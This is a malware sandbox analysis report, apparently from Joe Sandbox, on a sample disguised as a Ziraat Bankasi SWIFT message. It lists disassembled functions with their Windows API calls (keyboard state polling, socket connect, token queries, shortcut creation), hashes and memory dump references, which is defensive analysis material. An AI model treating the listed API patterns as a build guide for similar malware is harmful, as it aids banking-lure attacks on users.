Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: 7744b63cfa82146985473a904ec2be987a7193ac6bb8ba426be6a76c6759cd32
Instruction ID: 0c475fcad09d091231ee511b008792b543ab91cd0b56d485ed993d59d6a41a19
Opcode Fuzzy Hash: 7744b63cfa82146985473a904ec2be987a7193ac6bb8ba426be6a76c6759cd32
Instruction Fuzzy Hash: 67411E35600109EFDF05EFA4C9819AEBBF5FF49314B148095E906AB762CB31EE51DB50

Function 000BB63C Relevance: 7.6, APIs: 5, Instructions: 110keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(000000FF), ref: 000BB64F
ScreenToClient.USER32(00000000,000000FF), ref: 000BB66C
GetAsyncKeyState.USER32(00000001), ref: 000BB691
GetAsyncKeyState.USER32(00000002), ref: 000BB69F

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 8a5390e3330c804f6efa113b3f8249112c4aa55cead3089e134a80bed7e0e0fe
Instruction ID: 249cc336eb266e20bf3a8bce8d16d9d7d65636cb791e9ae6c042f99616064d76
Opcode Fuzzy Hash: 8a5390e3330c804f6efa113b3f8249112c4aa55cead3089e134a80bed7e0e0fe
Instruction Fuzzy Hash: 97417135608115FBCF299F64C844AE9BBB4FB05324F204329F869962D0C774AE95DFA1

Function 000DB358 Relevance: 7.6, APIs: 5, Instructions: 88sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 000DB369
PostMessageW.USER32(?,00000201,00000001), ref: 000DB413
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 000DB41B
PostMessageW.USER32(?,00000202,00000000), ref: 000DB429
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 000DB431

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: d68a9484a17aa668870944abf6d372ed55e876d9b9dfaefd3d3975581ee00e6c
Instruction ID: d7e3fb4ae71e306362ec67c32bdf864dbbac1b7db3fbdd0915fe20bfa1e1b27b
Opcode Fuzzy Hash: d68a9484a17aa668870944abf6d372ed55e876d9b9dfaefd3d3975581ee00e6c
Instruction Fuzzy Hash: B131A071900319EBDF14CF68D94DA9E7BB5EB04315F11422AF921A62D1C3B0DA65DBA0

Function 000E6318 Relevance: 7.6, APIs: 5, Instructions: 80COMMON

Download Yara Rule

APIs

Part of subcall function 000A50E6: _wcsncpy.LIBCMT ref: 000A50FA

GetFileAttributesW.KERNEL32(?,?,?,?,000E60C3), ref: 000E6369
GetLastError.KERNEL32(?,?,?,000E60C3), ref: 000E6374
CreateDirectoryW.KERNEL32(?,00000000,?,?,?,000E60C3), ref: 000E6388
_wcsrchr.LIBCMT ref: 000E63AA

Part of subcall function 000E6318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,000E60C3), ref: 000E63E0

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
String ID:
API String ID: 3633006590-0
Opcode ID: 9ae15bf2132f5fe39f65a1de697bfa18fea3a0edb88daadbc0f0baeba86979ea
Instruction ID: a2f7d168e892bc4112fb6bf7565aa10f7f2b0dbb10d230ae86adb76f40f06ea2
Opcode Fuzzy Hash: 9ae15bf2132f5fe39f65a1de697bfa18fea3a0edb88daadbc0f0baeba86979ea
Instruction Fuzzy Hash: 2F21C9319042559FDB35A775FC42FEE23ACAF353E0F100469F045E3081EA62DA858A55

Function 000F8B95 Relevance: 7.6, APIs: 5, Instructions: 71networkCOMMON

Download Yara Rule

APIs

Part of subcall function 000FA82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 000FA84E

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 000F8BD3
WSAGetLastError.WSOCK32(00000000), ref: 000F8BE2
connect.WSOCK32(00000000,?,00000010), ref: 000F8BFE

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: ErrorLastconnectinet_addrsocket
String ID:
API String ID: 3701255441-0
Opcode ID: b59addddf3df19e13299ad603758d7b2658fedcc16c6645ebcce8d67e2648163
Instruction ID: ede86e225c2584ac690a00f66e4132d816aa9f6c8b0afe68fb5929230e1f4039
Opcode Fuzzy Hash: b59addddf3df19e13299ad603758d7b2658fedcc16c6645ebcce8d67e2648163
Instruction Fuzzy Hash: 5D21C031300214AFDB20AF68DC85FBE77E9AF48714F048459FA16AB292CB74AC428B51

Function 000F8420 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 000F8441
GetForegroundWindow.USER32 ref: 000F8458
GetDC.USER32(00000000), ref: 000F8494
GetPixel.GDI32(00000000,?,00000003), ref: 000F84A0
ReleaseDC.USER32(00000000,00000003), ref: 000F84DB

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 3c4eee205c0a819242b839f667099715129414d2976d55cb36b0f3a971c7907b
Instruction ID: 26142518a41c00c97d3a8157ff07b7281c6869f554c2f4293a105dd6af5219d3
Opcode Fuzzy Hash: 3c4eee205c0a819242b839f667099715129414d2976d55cb36b0f3a971c7907b
Instruction Fuzzy Hash: 9C21A136A00204AFD710DFA4D889AAEBBF5EF48301F048479E95A97652CF70EC41DB60

Function 000BAF83 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 000BAFE3
SelectObject.GDI32(?,00000000), ref: 000BAFF2
BeginPath.GDI32(?), ref: 000BB009
SelectObject.GDI32(?,00000000), ref: 000BB033

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: eb183d73d2e95fe1d0e1baa30d6c5ea0f5798f8eed8b824d082cd207326f7574
Instruction ID: fc9129f61f02ca324add40771ccabae9d9964deaeaaa39be9adfc8c462eeaa0f
Opcode Fuzzy Hash: eb183d73d2e95fe1d0e1baa30d6c5ea0f5798f8eed8b824d082cd207326f7574
Instruction Fuzzy Hash: 15217FB5914305FFDB20AF99EC48BEA7BA9BB14355F18422AF825925A0C3F048D1DF91

Function 000C217F Relevance: 7.6, APIs: 5, Instructions: 61threadCOMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 000C21A9
CreateThread.KERNEL32(?,?,000C22DF,00000000,?,?), ref: 000C21ED
GetLastError.KERNEL32 ref: 000C21F7
_free.LIBCMT ref: 000C2200
__dosmaperr.LIBCMT ref: 000C220B

Part of subcall function 000C7C0E: __getptd_noexit.LIBCMT ref: 000C7C0E

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
String ID:
API String ID: 2664167353-0
Opcode ID: 6ecb655dc3c2edace6c7d93610ac400d3cbde3aff5506b350a21fe6b3f96a74c
Instruction ID: 436ce2752de29f46d2c91e80505ad2d5d3ffb3ca6d3c83f79c386ac957230eed
Opcode Fuzzy Hash: 6ecb655dc3c2edace6c7d93610ac400d3cbde3aff5506b350a21fe6b3f96a74c
Instruction Fuzzy Hash: 5911C832104306AF9B21AFA5DC42FDF37D8EF45770B10042DFD1886592DB71D8519AA1

Function 000DABBB Relevance: 7.5, APIs: 5, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 000DABD7
GetLastError.KERNEL32(?,000DA69F,?,?,?), ref: 000DABE1
GetProcessHeap.KERNEL32(00000008,?,?,000DA69F,?,?,?), ref: 000DABF0
HeapAlloc.KERNEL32(00000000,?,000DA69F,?,?,?), ref: 000DABF7
GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 000DAC0E

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 4baeabe9a5f835df437f1012bf1df8b9bd915c73ee4192d39e624bf3942044dd
Instruction ID: bd82cfd5c3671e81b66598d8add3625df333d20d8e8a56f1d8a5e9e2ab8fbc3e
Opcode Fuzzy Hash: 4baeabe9a5f835df437f1012bf1df8b9bd915c73ee4192d39e624bf3942044dd
Instruction Fuzzy Hash: C501FB71310304BFDB204FA5EC48DAB3AADEF8A765710042AF545D2250D6719CA1CA71

Function 000E7A58 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 000E7A74
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 000E7A82
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 000E7A8A
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 000E7A94
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 000E7AD0

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 68b6064bdcaa274cba843e4327e2b37cb09c3b4e9116afeb54876e0e24799c6b
Instruction ID: 70be9fc4d8942e28867f33b8a5994ef17a5b3ed7df8e2c3c4f8815d32ed00fb9
Opcode Fuzzy Hash: 68b6064bdcaa274cba843e4327e2b37cb09c3b4e9116afeb54876e0e24799c6b
Instruction Fuzzy Hash: A3016931C04619EFDF24AFE6EC48ADDBBB8FB48301F090465E502B2950DB3096A1C7A2

Function 000D9ABF Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32 ref: 000D9ADC
ProgIDFromCLSID.OLE32(?,00000000), ref: 000D9AF7
lstrcmpiW.KERNEL32(?,00000000), ref: 000D9B05
CoTaskMemFree.OLE32(00000000,?,00000000), ref: 000D9B15
CLSIDFromString.OLE32(?,?), ref: 000D9B21

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 854f6800558a325c26b6bd1d243a465ed5e46ffa0bfeaff6a9fabb0ed638e3f0
Instruction ID: ee679cffe3e6c4136902258e25e84ef1e9078d464481fef46132e3be4b25feff
Opcode Fuzzy Hash: 854f6800558a325c26b6bd1d243a465ed5e46ffa0bfeaff6a9fabb0ed638e3f0
Instruction Fuzzy Hash: 77018F76600304BFDB204F68ED44B9A7AEDEB44361F154026F905E2210D771DD419BB0

Function 000DAA62 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 000DAA79
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 000DAA83
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 000DAA92
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 000DAA99
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 000DAAAF

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 5f799598e2f580d46eeae7de8535861ac97ebd1f35454bdb7b0210cbb9481a54
Instruction ID: 8d74cec3844b42d3007aecd4eec99251dc48ec2eb1df1478249122075d25b869
Opcode Fuzzy Hash: 5f799598e2f580d46eeae7de8535861ac97ebd1f35454bdb7b0210cbb9481a54
Instruction Fuzzy Hash: BDF03C712003047FEB215FA8EC89E673BACFB4A754B10051AF941C66A0DB609C92CA72

Function 000DAAC3 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 000DAADA
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 000DAAE4
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 000DAAF3
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 000DAAFA
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 000DAB10

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: fab394a4bd13664ca99a5359b5d797c0b50c11bb95067e3de4194cdec7a63861
Instruction ID: 97b1ee83d9e82a826a1c2e02dc5c175dc5291b03d3af2e114fd462571e245c3f
Opcode Fuzzy Hash: fab394a4bd13664ca99a5359b5d797c0b50c11bb95067e3de4194cdec7a63861
Instruction Fuzzy Hash: F4F03C713003087FEB210FA4EC98E673BADFB46764F10042AF941C76A0CB6098638A71

Function 000DEC80 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 000DEC94
GetWindowTextW.USER32(00000000,?,00000100), ref: 000DECAB
MessageBeep.USER32(00000000), ref: 000DECC3
KillTimer.USER32(?,0000040A), ref: 000DECDF
EndDialog.USER32(?,00000001), ref: 000DECF9

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: d40e3758a33f82f0c0a469864fa5ffbd2f078f0ef25f49b61266e6320e2bad77
Instruction ID: 7bd5752c608cb38731418feb7455a98f309b4914383b295542ff08b9c589afd9
Opcode Fuzzy Hash: d40e3758a33f82f0c0a469864fa5ffbd2f078f0ef25f49b61266e6320e2bad77
Instruction Fuzzy Hash: 9201F430510744ABEB306B10EE4EB9677B8FF00B09F00055AB583A59E0DBF4AAA6CB50

Function 000BB0AB Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 000BB0BA
StrokeAndFillPath.GDI32(?,?,0011E680,00000000,?,?,?), ref: 000BB0D6
SelectObject.GDI32(?,00000000), ref: 000BB0E9
DeleteObject.GDI32 ref: 000BB0FC
StrokePath.GDI32(?), ref: 000BB117

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 4d632b0fd3e059c6bb30c8446312a98c52e94231ef1f1207a6ccf4e2697ca786
Instruction ID: dd83b2872ac6c920a3e0ba2e8b771a97a4dd136d87901ce04f87eaffebd58fae
Opcode Fuzzy Hash: 4d632b0fd3e059c6bb30c8446312a98c52e94231ef1f1207a6ccf4e2697ca786
Instruction Fuzzy Hash: 81F0B239004248BFDB21AF69EC097A93BA5AB10362F488315F929958F0C7F189E6DF54

Function 000EF23D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 277comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 000EF2DA
CoCreateInstance.OLE32(0012DA7C,00000000,00000001,0012D8EC,?), ref: 000EF2F2
CoUninitialize.OLE32 ref: 000EF555

Strings

.lnk, xrefs: 000EF28B, 000EF290, 000EF29E

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize
String ID: .lnk
API String ID: 948891078-24824748
Opcode ID: 213acc258cf78497f43b73e1356c9a5ade18070267e3db7bc51b8be486a31dd1
Instruction ID: 8ac6415518a571b1bbe8f331731ed986dad15de01ee9c20cafd8e9310174c418
Opcode Fuzzy Hash: 213acc258cf78497f43b73e1356c9a5ade18070267e3db7bc51b8be486a31dd1
Instruction Fuzzy Hash: 54A10B72104201AFD300EFA4C881DEBB7E8EF99754F00492DF5559B192EB71EA49CB62

Function 000EE7DD Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON

Download Yara Rule

APIs

Part of subcall function 000A660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000A53B1,?,?,000A61FF,?,00000000,00000001,00000000), ref: 000A662F

CoInitialize.OLE32(00000000), ref: 000EE85D
CoCreateInstance.OLE32(0012DA7C,00000000,00000001,0012D8EC,?), ref: 000EE876
CoUninitialize.OLE32 ref: 000EE893

Part of subcall function 000A936C: __swprintf.LIBCMT ref: 000A93AB
Part of subcall function 000A936C: __itow.LIBCMT ref: 000A93DF

Strings

.lnk, xrefs: 000EE83B, 000EE84D

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

Associated: 00000000.00000002.1336927619.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000012D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1337991243.000000000014E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338142193.000000000015A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1338160801.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a0000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
String ID: .lnk
API String ID: 2126378814-24824748
Opcode ID: 13ad33ce38ad4b8eb2a21bb9b6fba8df70867c5b6ef99972f40d433618c2c400
Instruction ID: cc979c95ef7e362b43b0900aa8065656a9bff1e6891cb213cc1a317f5f136fb0
Opcode Fuzzy Hash: 13ad33ce38ad4b8eb2a21bb9b6fba8df70867c5b6ef99972f40d433618c2c400
Instruction Fuzzy Hash: 61A15435604345AFCB10DF55C884D6EBBE5BF89310F048998F99AAB3A2CB31ED45CB91

Function 000C325D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 000C32ED

Part of subcall function 000CE0D0: __87except.LIBCMT ref: 000CE10B

Strings

pow, xrefs: 000C32C5, 000C32E2

Memory Dump Source

Source File: 00000000.00000002.1336985531.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true

